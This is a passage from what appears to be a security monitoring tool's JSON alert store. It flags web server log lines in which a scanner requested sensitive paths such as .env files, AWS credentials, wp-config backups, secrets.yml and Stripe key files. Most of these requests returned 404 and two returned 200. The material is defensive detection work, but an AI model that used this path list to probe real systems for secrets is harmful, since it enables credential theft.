"source": "auto", "reason": "Access to a system file path /var/.env via HTTP is a common probe for sensitive files; though the request returned 404, it indicates potential reconnaissance.", "original_line": "\u001b[0mGET /var/.env \u001b[33m404\u001b[\u003cDUR\u003e 2.847 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:39.434307274Z" }, "49282abe819852d4cb4d2c78901986c276ed8631bde66b68f637dd44c7d476ac": { "type": "hash", "value": "49282abe819852d4cb4d2c78901986c276ed8631bde66b68f637dd44c7d476ac", "source": "auto", "reason": "Access to a potentially sensitive file stripe_secret.json resulted in a 404. This could be a probe for sensitive endpoints.", "original_line": "\u001b[0mGET /stripe_secret.json \u001b[33m404\u001b[\u003cDUR\u003e 3.537 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:01.151999055Z" }, "4a1a3386d8badbd629c5fd52d1b25fc5d8ccd4ff7bd3dc5d6fb9aac1178abcf8": { "type": "hash", "value": "4a1a3386d8badbd629c5fd52d1b25fc5d8ccd4ff7bd3dc5d6fb9aac1178abcf8", "source": "auto", "reason": "HTTP 404 for a request targeting a sensitive file path (.circleci/stripe.env) suggests probing for confidential environment configuration; not a successful breach but warrants attention.", "original_line": "\u001b[0mGET /.circleci/stripe.env \u001b[33m404\u001b[\u003cDUR\u003e 0.696 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:21.786115827Z" }, "4c36504fe60ba4dc27a0746b1d705e43ed222ddc84b6a6ccce134a84340d36a7": { "type": "hash", "value": "4c36504fe60ba4dc27a0746b1d705e43ed222ddc84b6a6ccce134a84340d36a7", "source": "auto", "reason": "404 on /config.inc could indicate an attempt to probe for sensitive configuration files or misconfigured paths", "original_line": "\u001b[0mGET /config.inc \u001b[33m404\u001b[\u003cDUR\u003e 1.246 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:18.600871333Z" }, "4c3a88eed15b2fdf0542bfb38e32d65b6708c38c83e71fbc4a69d8336b319eb4": { "type": "hash", "value": "4c3a88eed15b2fdf0542bfb38e32d65b6708c38c83e71fbc4a69d8336b319eb4", "source": "auto", "reason": "Request to /core/.env is a common probe for sensitive file exposure; although 404, it indicates potential reconnaissance activity.", "original_line": "\u001b[0mGET /core/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.220 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:30.012213042Z" }, "4cd1b74306709b5bb659d141aa085759eaf8db4abfb9c3bff8c84787a58bc68b": { "type": "hash", "value": "4cd1b74306709b5bb659d141aa085759eaf8db4abfb9c3bff8c84787a58bc68b", "source": "auto", "reason": "Request to Laravel .env file path (common attempt to discover environment configuration). 404 indicates not found but pattern is a probing behavior.", "original_line": "\u001b[0mGET /laravel/core/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.548 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:18.689937646Z" }, "4e926dae89fc2a6231deb513b381f2b9465f1de2fd88447a55d39ed1ae2158cf": { "type": "hash", "value": "4e926dae89fc2a6231deb513b381f2b9465f1de2fd88447a55d39ed1ae2158cf", "source": "auto", "reason": "Access to a sensitive file path (.env) via HTTP, 404 response, may indicate probing or misconfiguration.", "original_line": "\u001b[0mGET /docker/app/.env \u001b[33m404\u001b[\u003cDUR\u003e 3.247 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:49.619076872Z" }, "4f2217df540cea0e36fc5bad82d53ae2cdfbeb3c677b8a68c950329d1a658c6f": { "type": "hash", "value": "4f2217df540cea0e36fc5bad82d53ae2cdfbeb3c677b8a68c950329d1a658c6f", "source": "auto", "reason": "Request to a .env file path ( /.env ) is a common probe for sensitive configuration exposure. The request returned 404 but indicates potential scanning activity.", "original_line": "\u001b[0mGET /www/.env \u001b[33m404\u001b[\u003cDUR\u003e 13.566 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:04.455183762Z" }, "513a1624e955d567e778876e28f234a7e1a1476e41865e92a010b1e4533c5511": { "type": "hash", "value": "513a1624e955d567e778876e28f234a7e1a1476e41865e92a010b1e4533c5511", "source": "auto", "reason": "Access attempt to a sensitive environment file (.env.staging) detected, which is commonly probed in scans.", "original_line": "\u001b[0mGET /.env.staging \u001b[33m404\u001b[\u003cDUR\u003e 0.551 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:40.612453261Z" }, "51788c3807494c9ea3e8b2f9da2080cd52b59cb2deff3214a4d1bef4b28440d6": { "type": "hash", "value": "51788c3807494c9ea3e8b2f9da2080cd52b59cb2deff3214a4d1bef4b28440d6", "source": "auto", "reason": "Request to /wp-config.php.save returning 404 suggests probing for sensitive WordPress configuration files.", "original_line": "\u001b[0mGET /wp-config.php.save \u001b[33m404\u001b[\u003cDUR\u003e 1.494 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:35.7968357Z" }, "54bd1f747e98df41a030ce9caf42480cd67bddec96007418d0a320eeda3d3ef9": { "type": "hash", "value": "54bd1f747e98df41a030ce9caf42480cd67bddec96007418d0a320eeda3d3ef9", "source": "auto", "reason": "Request to a sensitive path /.aws/config resulting in 404 suggests probing for AWS config exposure. Not confirmed malicious, but warrants attention.", "original_line": "\u001b[0mGET /.aws/config \u001b[33m404\u001b[\u003cDUR\u003e 0.468 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:54.592620876Z" }, "55597a96e79684207cbdcd8dfe965a748c49d5588e7625515bd8b08d3bb2d1d9": { "type": "hash", "value": "55597a96e79684207cbdcd8dfe965a748c49d5588e7625515bd8b08d3bb2d1d9", "source": "auto", "reason": "Access to a sensitive path (/settings.py) resulting in 404 may indicate probing or information gathering.", "original_line": "\u001b[0mGET /settings.py \u001b[33m404\u001b[\u003cDUR\u003e 0.835 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:06.646533199Z" }, "556d00992946103ed2d03f8151a1e537b844b7b9ae1aef357a90ca1b874ba196": { "type": "hash", "value": "556d00992946103ed2d03f8151a1e537b844b7b9ae1aef357a90ca1b874ba196", "source": "auto", "reason": "404 response for /stripe.conf suggests probing for a sensitive configuration file", "original_line": "\u001b[0mGET /stripe.conf \u001b[33m404\u001b[\u003cDUR\u003e 0.695 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:21.785010432Z" }, "57ed8cc31b9e90d9dc84af95cf3988a87fc20261782a077aa15d495b44c9e886": { "type": "hash", "value": "57ed8cc31b9e90d9dc84af95cf3988a87fc20261782a077aa15d495b44c9e886", "source": "auto", "reason": "Request to /config/secrets.yml returned 404, which is often attempted access to sensitive config or secrets. Not confirmed malicious, but warrants alert.", "original_line": "\u001b[0mGET /config/secrets.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.577 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:58.944831679Z" }, "5802ba951c569327c37abbf523b6ef0557ad1e9a671abf917f933ea0d56b0d24": { "type": "hash", "value": "5802ba951c569327c37abbf523b6ef0557ad1e9a671abf917f933ea0d56b0d24", "source": "auto", "reason": "Single 404 on an unusual path could indicate probing for sensitive files.", "original_line": "\u001b[0mGET /stripe.backup \u001b[33m404\u001b[\u003cDUR\u003e 0.910 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:50.199548798Z" }, "581dc8f88a705b74b590b3a013cb465d0905dc6ae6890f9ded7d606ddf56820d": { "type": "hash", "value": "581dc8f88a705b74b590b3a013cb465d0905dc6ae6890f9ded7d606ddf56820d", "source": "auto", "reason": "Access to /_profiler/latest endpoint is commonly targeted by probing or misconfig attempts; HTTP 404 on this path is a potential information-gathering probe.", "original_line": "\u001b[0mGET /_profiler/latest \u001b[33m404\u001b[\u003cDUR\u003e 0.433 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:00.165531524Z" }, "58b3edeed63ca8986095a13554ace9309359c29e09f84a2c5d277e123203cb33": { "type": "hash", "value": "58b3edeed63ca8986095a13554ace9309359c29e09f84a2c5d277e123203cb33", "source": "auto", "reason": "Access to a sensitive file path (.env) via HTTP request (GET /kyc/.env) could indicate probing or credential exposure attempts.", "original_line": "\u001b[0mGET /kyc/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.044 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:43.444330886Z" }, "5a0035f46ebeeaa0160824d190bfcff75d885443a53ee58ac7509433c24bb37b": { "type": "hash", "value": "5a0035f46ebeeaa0160824d190bfcff75d885443a53ee58ac7509433c24bb37b", "source": "auto", "reason": "Access to a dot-env file path (/env.txt/.env.txt) is commonly probed by attackers to discover sensitive configuration data; the request returned 404 but indicates potential reconnaissance activity.", "original_line": "\u001b[0mGET /.env.txt \u001b[33m404\u001b[\u003cDUR\u003e 0.654 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:01.727332477Z" }, "5a7990a8fc70f6fa1aab4ac606382fb31a8319b75fb5cf1fd21e64c95bf4e6d1": { "type": "hash", "value": "5a7990a8fc70f6fa1aab4ac606382fb31a8319b75fb5cf1fd21e64c95bf4e6d1", "source": "auto", "reason": "Request to access a sensitive file (/conf/.env) resulting in 404 suggests probing or misconfiguration; not definitive malicious but noteworthy.", "original_line": "\u001b[0mGET /conf/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.898 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:59.884577846Z" }, "5b0a5acad69b507e59b1c6975e66de4aa94cf596bc3dab90e2c2cbe67251945b": { "type": "hash", "value": "5b0a5acad69b507e59b1c6975e66de4aa94cf596bc3dab90e2c2cbe67251945b", "source": "auto", "reason": "Access to the .env file path in a GET request is a common probe pattern; 404 indicates not found but the attempt itself is suspicious for potential information disclosure attempts.", "original_line": "\u001b[0mGET /new/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.700 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:54.523843392Z" }, "5fbb4e60b1346fb844d0f58adb0d3a7232d532f9c1157b21dde3a45d1228801c": { "type": "hash", "value": "5fbb4e60b1346fb844d0f58adb0d3a7232d532f9c1157b21dde3a45d1228801c", "source": "auto", "reason": "Access to /api/v1/.env is often targeted to discover sensitive environment configuration; while it may be a legitimate test, it is commonly associated with probing attempts.", "original_line": "\u001b[0mGET /api/v1/.env \u001b[32m200\u001b[\u003cDUR\u003e 0.503 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:44.902320031Z" }, "60619f9ac38d9d2cc618f01c1a9973838c40eb12788a3460d5b9ecdccaf90410": { "type": "hash", "value": "60619f9ac38d9d2cc618f01c1a9973838c40eb12788a3460d5b9ecdccaf90410", "source": "auto", "reason": "Request to secrets.yaml could indicate probing for sensitive files; 404 response but repeated access to a sensitive-named path warrants attention.", "original_line": "\u001b[0mGET /secrets.yaml \u001b[33m404\u001b[\u003cDUR\u003e 0.745 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:39.513304293Z" }, "6297474f7701a65f84180abd5fc908725dcc901bbc13b0d27feca52846e5d750": { "type": "hash", "value": "6297474f7701a65f84180abd5fc908725dcc901bbc13b0d27feca52846e5d750", "source": "auto", "reason": "Access to a .env file via HTTP endpoint is unusual and could indicate probing for sensitive configuration leaks.", "original_line": "\u001b[0mGET /graphql/.env \u001b[33m404\u001b[\u003cDUR\u003e 5.914 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:09.434393736Z" }, "62e2a3864991263a0481d34cf8d43a7ef55d396a3a0f00dadb632a3acd7eeb89": { "type": "hash", "value": "62e2a3864991263a0481d34cf8d43a7ef55d396a3a0f00dadb632a3acd7eeb89", "source": "auto", "reason": "Request to a hidden config file path (.circleci/config.yml) returning 404 — possible probing for sensitive files.", "original_line": "\u001b[0mGET /.circleci/config.yml \u001b[33m404\u001b[\u003cDUR\u003e 1.472 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:09.376953036Z" }, "6446e657a40ec68c3abb57c2c620ff56bd3c3228e1b29c9a9125f91e282ac150": { "type": "hash", "value": "6446e657a40ec68c3abb57c2c620ff56bd3c3228e1b29c9a9125f91e282ac150", "source": "auto", "reason": "Request to a sensitive file path /.env.production.local which is commonly probed in environment disclosure attempts; returned 404 but behavior warrants scrutiny.", "original_line": "\u001b[0mGET /.env.production.local \u001b[33m404\u001b[\u003cDUR\u003e 0.747 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:31.151683441Z" }, "64e0eca7c318c698b17a3cdb99e412874700a5c72e51333bc436b8f18c0f7553": { "type": "hash", "value": "64e0eca7c318c698b17a3cdb99e412874700a5c72e51333bc436b8f18c0f7553", "source": "auto", "reason": "Access to /aws/credentials path commonly scanned for sensitive data exposure; 404 indicates not found but probing pattern is suspicious.", "original_line": "\u001b[0mGET /aws/credentials \u001b[33m404\u001b[\u003cDUR\u003e 0.562 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:01.105233434Z" }, "679a2ecd8a36f2569acd3f5bdac733b02e509dfcc9b6624a2521e68038332dff": { "type": "hash", "value": "679a2ecd8a36f2569acd3f5bdac733b02e509dfcc9b6624a2521e68038332dff", "source": "auto", "reason": "Access attempt to a sensitive dotfile (.env.json) which is commonly targeted in reconnaissance probes. Although the status is 404, repeated requests to such files can indicate probing for secrets.", "original_line": "\u001b[0mGET /.env.json \u001b[33m404\u001b[\u003cDUR\u003e 0.620 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:06.286066687Z" }, "6dc606e7e1e90c1cd7720aada495d971b41aeea68f540fdf8cefac6dde3a9b8f": { "type": "hash", "value": "6dc606e7e1e90c1cd7720aada495d971b41aeea68f540fdf8cefac6dde3a9b8f", "source": "auto", "reason": "HTTP 404 on /config.js could indicate probing for misconfig or missing assets; not definitive attack but warrants attention.", "original_line": "\u001b[0mGET /config.js \u001b[33m404\u001b[\u003cDUR\u003e 3.172 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:27.403628135Z" }, "6f146f23056c4ff4253c10850c7562a94da1a6b35c12548a79c611a3f4151530": { "type": "hash", "value": "6f146f23056c4ff4253c10850c7562a94da1a6b35c12548a79c611a3f4151530", "source": "auto", "reason": "Access to secrets.json is unusual and may indicate probing for sensitive files; 404 reduces risk but pattern is notable.", "original_line": "\u001b[0mGET /secrets.json \u001b[33m404\u001b[\u003cDUR\u003e 0.562 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:23.556498214Z" }, "6f4872cb98123126816e2edd695b6d098ead5f8ac69df2d25ac363d0d7351487": { "type": "hash", "value": "6f4872cb98123126816e2edd695b6d098ead5f8ac69df2d25ac363d0d7351487", "source": "auto", "reason": "Access to a hidden/.env file path is often probed by attackers to discover sensitive configuration data; 404 indicates not found but still noteworthy.", "original_line": "\u001b[0mGET /src/config/.env \u001b[33m404\u001b[\u003cDUR\u003e 6.227 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:12.798049194Z" }, "6f6b0ab9577baa82b67d75a58b6b48d0730aea116873c877cdcb584a1a24d5f8": { "type": "hash", "value": "6f6b0ab9577baa82b67d75a58b6b48d0730aea116873c877cdcb584a1a24d5f8", "source": "auto", "reason": "Access to secrets.yml returning 404 can indicate probing for sensitive files or misconfiguration; not definitive, but warrants alerting.", "original_line": "\u001b[0mGET /secrets.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.501 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:28.265819382Z" }, "705ae1aacc330a25f559c17cb9e767bd96c374e763d06f402aab0aa3470c0aa5": { "type": "hash", "value": "705ae1aacc330a25f559c17cb9e767bd96c374e763d06f402aab0aa3470c0aa5", "source": "auto", "reason": "HTTP 404 response with noticeable latency may indicate a broken link, probing, or misconfiguration; not definitively malicious but warrants monitoring.", "original_line": "\u001b[0mGET /subscribe \u001b[33m404\u001b[\u003cDUR\u003e 0.587 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:06.494569901Z" }, "7512f1f516899750b2a4e5ed4818f04a5dfb46a3f31e6eed2f877bc88db09fbb": { "type": "hash", "value": "7512f1f516899750b2a4e5ed4818f04a5dfb46a3f31e6eed2f877bc88db09fbb", "source": "auto", "reason": "Access to /wp-config is a common probe to locate sensitive WordPress configuration; 404 indicates not found but attempt is indicative of automated scanning.", "original_line": "\u001b[0mGET /wp-config \u001b[33m404\u001b[\u003cDUR\u003e 0.639 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:51.996234251Z" }, "75cccab2ccfd38ef0d22ec9b2573051416bf4fc17f39060b24177f57c1674b45": { "type": "hash", "value": "75cccab2ccfd38ef0d22ec9b2573051416bf4fc17f39060b24177f57c1674b45", "source": "auto", "reason": "HTTP 404 for config/stripe.yaml could indicate probing for sensitive configuration files; not definitive abuse but warrants attention", "original_line": "\u001b[0mGET /config/stripe.yaml \u001b[33m404\u001b[\u003cDUR\u003e 0.668 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:16.88133555Z" }, "767ee9e8469e3a324f4ad7fb3e849b9959144c70edbefce93dbedab5fe28938c": { "type": "hash", "value": "767ee9e8469e3a324f4ad7fb3e849b9959144c70edbefce93dbedab5fe28938c", "source": "auto", "reason": "Access to a sensitive file (.env) via the registry API path suggests probing behavior; not successful (404) but warrants alerting.", "original_line": "\u001b[0mGET /v2/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.731 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:17.578500007Z" }, "76df5cba22148acda1378bd4d7ab1e67a3c6a49fdd6164442a5f740407bc5097": { "type": "hash", "value": "76df5cba22148acda1378bd4d7ab1e67a3c6a49fdd6164442a5f740407bc5097", "source": "auto", "reason": "Request to a sensitive file (.env.development) returning 404 could indicate probing for misconfigurations; not definitive but warrants alert.", "original_line": "\u001b[0mGET /.env.development \u001b[33m404\u001b[\u003cDUR\u003e 0.630 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:18.570495353Z" }, "777af1870e709f118f99f8e5854ac5401909f19286fb3325b46063f4769e2828": { "type": "hash", "value": "777af1870e709f118f99f8e5854ac5401909f19286fb3325b46063f4769e2828", "source": "auto", "reason": "HTTP GET for a sensitive path (.env) returning 404 indicates probing for exposed configuration files.", "original_line": "\u001b[0mGET /apps/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.668 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:22.880283776Z" }, "7a8732519588352bda5b59e4f750e1a8318299d9217f507372dde1fcb5946686": { "type": "hash", "value": "7a8732519588352bda5b59e4f750e1a8318299d9217f507372dde1fcb5946686", "source": "auto", "reason": "Access to a hidden environment file (.env) under node_modules is commonly probed by attackers to discover sensitive configuration.", "original_line": "\u001b[0mGET /node_modules/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.035 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:52.707767066Z" }, "7addf7faf8adb514ad195931a645c540621ad04c34c9f4e79f1e25314aae3399": { "type": "hash", "value": "7addf7faf8adb514ad195931a645c540621ad04c34c9f4e79f1e25314aae3399", "source": "auto", "reason": "Access to the .env file via HTTP is a common probe pattern attempting to disclose configuration secrets. Not definitive malicious activity, but warrants alerting.", "original_line": "\u001b[0mGET /crm/.env \u001b[33m404\u001b[\u003cDUR\u003e 3.698 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:13.736127545Z" }, "7decff31a53838b83f7e616b32654abcd07387169805506de470af4221f6344d": { "type": "hash", "value": "7decff31a53838b83f7e616b32654abcd07387169805506de470af4221f6344d", "source": "auto", "reason": "Request for a sensitive path (/test/.env) resulting in 404 indicates probing for environment files; could be reconnaissance.", "original_line": "\u001b[0mGET /test/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.615 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:56.111051755Z" }, "7e0e68c297f803cfeb1ec3d169a7fb4f5023f1a4be83393ae82e6c63f41269ec": { "type": "hash", "value": "7e0e68c297f803cfeb1ec3d169a7fb4f5023f1a4be83393ae82e6c63f41269ec", "source": "auto", "reason": "Single 404 on admin-ajax.php can indicate probing or automated scans targeting WordPress admin endpoints. Not definitively malicious but warrants monitoring.", "original_line": "\u001b[0mGET /wp-admin/admin-ajax.php \u001b[33m404\u001b[\u003cDUR\u003e 0.940 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:38.779617338Z" }, "7f430948c98335a99f2ae14ef2dd7ddfba9fff103b7a606a75c8368fd81869ca": { "type": "hash", "value": "7f430948c98335a99f2ae14ef2dd7ddfba9fff103b7a606a75c8368fd81869ca", "source": "auto", "reason": "404 for a sensitive-looking file (parameters.yml) suggests probing or accidental exposure; warrants monitoring but not definitive malicious activity.", "original_line": "\u001b[0mGET /parameters.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.787 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:45.963794034Z" }, "804e0cc4606db3271b5776c159650dd934743cfd2ab4bb1694fc01e8a89826d8": { "type": "hash", "value": "804e0cc4606db3271b5776c159650dd934743cfd2ab4bb1694fc01e8a89826d8", "source": "auto", "reason": "Access to dot-env file path / .env.stripe returning 404 suggests probing for sensitive files; not confirmed malicious but warrants attention.", "original_line": "\u001b[0mGET /.env.stripe \u001b[33m404\u001b[\u003cDUR\u003e 0.597 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:14.892462656Z" }, "80bfa9beec9200c157181a59ba027ca2cde25d68e6ce3291e80d0e39ba79f8e4": { "type": "hash", "value": "80bfa9beec9200c157181a59ba027ca2cde25d68e6ce3291e80d0e39ba79f8e4", "source": "auto", "reason": "Request for a sensitive file (.env) resulting in 404; likely probing for secrets", "original_line": "\u001b[0mGET /development/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.784 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:32.10266992Z" }, "81ddd9a75e542f98fadc66245b8764fed4ccfa105d0aeace97e30ada35478be2": { "type": "hash", "value": "81ddd9a75e542f98fadc66245b8764fed4ccfa105d0aeace97e30ada35478be2", "source": "auto", "reason": "Access to a sensitive file path (.env) via API endpoint is unusual and may indicate probing for secrets.", "original_line": "\u001b[0mGET /api/.env \u001b[32m200\u001b[\u003cDUR\u003e 1.419 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:34.735084581Z" }, "82547c295caf2f3e73712e789675363c7b994ca94af4ce8e739af0ace6732283": { "type": "hash", "value": "82547c295caf2f3e73712e789675363c7b994ca94af4ce8e739af0ace6732283", "source": "auto", "reason": "Single 404 response to a /register request could indicate probing or misconfiguration; not definitive malicious activity but warrants monitoring.", "original_line": "\u001b[0mGET /register \u001b[33m404\u001b[\u003cDUR\u003e 0.572 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:12.290558603Z" }, "88e655b28ededa5cc8e95bde3e1ebf20e6e82a97d21e05b60b0d7149f1c289fe": { "type": "hash", "value": "88e655b28ededa5cc8e95bde3e1ebf20e6e82a97d21e05b60b0d7149f1c289fe", "source": "auto", "reason": "404 Not Found for a path under storage/keys may indicate probing for sensitive configuration files", "original_line": "\u001b[0mGET /storage/keys/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 0.670 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:04.71665459Z" }, "8a0333ea89cbb22a090fb544f9e2b24c533420f25e07729fbb5880ba5b5fe0ae": { "type": "hash", "value": "8a0333ea89cbb22a090fb544f9e2b24c533420f25e07729fbb5880ba5b5fe0ae", "source": "auto", "reason": "Access to a sensitive file path (.env.dev) commonly targeted in attacks or misconfig checks, returned 404 but indicates probing behavior.", "original_line": "\u001b[0mGET /.env.dev \u001b[33m404\u001b[\u003cDUR\u003e 0.618 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:14.680036337Z" }, "8c301f199a1fada8e75721a96576264aefb8c2a861f958f9f5cb631685ed58cd": { "type": "hash", "value": "8c301f199a1fada8e75721a96576264aefb8c2a861f958f9f5cb631685ed58cd", "source": "auto", "reason": "Access to a sensitive path /.env.example returning 404 may indicate probing for secret files", "original_line": "\u001b[0mGET /.env.example \u001b[33m404\u001b[\u003cDUR\u003e 1.779 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:15.74036903Z" }, "8c875a186bbd93bb67d8e9cbd7d62d759b6d38f038f7064770d80cce43b06647": { "type": "hash", "value": "8c875a186bbd93bb67d8e9cbd7d62d759b6d38f038f7064770d80cce43b06647", "source": "auto", "reason": "HTTP 404 on a test PHP file may indicate probing or misconfiguration; not clearly malicious but warrants monitoring.", "original_line": "\u001b[0mGET /test.php \u001b[33m404\u001b[\u003cDUR\u003e 0.593 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:25.897678974Z" }, "92d7c089b7cce16e3b09f78868493c64c825dd74cb1120a9427586624b691da6": { "type": "hash", "value": "92d7c089b7cce16e3b09f78868493c64c825dd74cb1120a9427586624b691da6", "source": "auto", "reason": "Access to phpinfo.php often scans for PHP info disclosure; 404 indicates not found but probe-like pattern.", "original_line": "\u001b[0mGET /phpinfo.php \u001b[33m404\u001b[\u003cDUR\u003e 0.430 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:36.17998259Z" }, "92fa7b616b59044f6bfb327eaf1e02299afbabfefd5024b8b00e5712d7920698": { "type": "hash", "value": "92fa7b616b59044f6bfb327eaf1e02299afbabfefd5024b8b00e5712d7920698", "source": "auto", "reason": "Access to a hidden file path (.env.save) returning 404 suggests a probe for sensitive files. Not definitive malicious activity, but warrants monitoring.", "original_line": "\u001b[0mGET /.env.save \u001b[33m404\u001b[\u003cDUR\u003e 2.036 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:09.946437312Z" }, "9489bafa7ad85cf578ac9f98244c16fbd5eb0b61da90af14087830be64f17676": { "type": "hash", "value": "9489bafa7ad85cf578ac9f98244c16fbd5eb0b61da90af14087830be64f17676", "source": "auto", "reason": "Request to wp-config.php.txt is a common probing pattern to locate WordPress configuration or sensitive files; 404 response suggests the resource doesn't exist, but the pattern is indicative of unauthorized probing.", "original_line": "\u001b[0mGET /wp-config.php.txt \u001b[33m404\u001b[\u003cDUR\u003e 1.652 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:30.337339333Z" }, "94b110f3133646626eda49e85822d84e11d71eee81c4f53bb506564e65ecbe42": { "type": "hash", "value": "94b110f3133646626eda49e85822d84e11d71eee81c4f53bb506564e65ecbe42", "source": "auto", "reason": "Request targets a sensitive path (/dev/.env) and returns 404, which can indicate probing for sensitive files.", "original_line": "\u001b[0mGET /dev/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.932 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:45.86543438Z" }, "95c8ab415ea87825f60ea440f7a50a1a2a2a42ad15533d35d004e5e78fdfcaef": { "type": "hash", "value": "95c8ab415ea87825f60ea440f7a50a1a2a2a42ad15533d35d004e5e78fdfcaef", "source": "auto", "reason": "Request to env.json returned 404, which can indicate probing for environment exposure or sensitive files.", "original_line": "\u001b[0mGET /env.json \u001b[33m404\u001b[\u003cDUR\u003e 2.630 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:34.401007857Z" }, "9734c5d6db01d8c6aa641fd5d1a131cc95a86027859d9f8a0cc7d3e0a39da829": { "type": "hash", "value": "9734c5d6db01d8c6aa641fd5d1a131cc95a86027859d9f8a0cc7d3e0a39da829", "source": "auto", "reason": "Request to credentials.yml under /config path returning 404 could indicate probing for sensitive files; not definitive exploitation but merits alerting.", "original_line": "\u001b[0mGET /config/credentials.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.606 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:07.084268558Z" }, "9847db7f1c80076545f56bcaa75b5d8506ba1df1c426ca6bf085874d7836a25c": { "type": "hash", "value": "9847db7f1c80076545f56bcaa75b5d8506ba1df1c426ca6bf085874d7836a25c", "source": "auto", "reason": "External probe for wp-config.txt resulting in 404; common reconnaissance to locate WordPress config.", "original_line": "\u001b[0mGET /wp-config.txt \u001b[33m404\u001b[\u003cDUR\u003e 0.641 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:57.607705044Z" }, "984e5bd14a7e42adce76bf283ccbf00394788b84189eb9fdaade3988d7d0522d": { "type": "hash", "value": "984e5bd14a7e42adce76bf283ccbf00394788b84189eb9fdaade3988d7d0522d", "source": "auto", "reason": "Request to a sensitive file (.env) leading to a 404, which could indicate probing for secrets. Not definitive malware, but warrants alert.", "original_line": "\u001b[0mGET /prod/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.885 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:49.764537447Z" }, "9aa849dcdc925f756e7128dbcaac0c2745a04f6675281de593dfc8d2fffc50e5": { "type": "hash", "value": "9aa849dcdc925f756e7128dbcaac0c2745a04f6675281de593dfc8d2fffc50e5", "source": "auto", "reason": "Access to serverless.yml could reveal configuration and is a potentially sensitive path being probed; not guaranteed malicious but warrants alerting.", "original_line": "\u001b[0mGET /serverless.yml \u001b[33m404\u001b[\u003cDUR\u003e 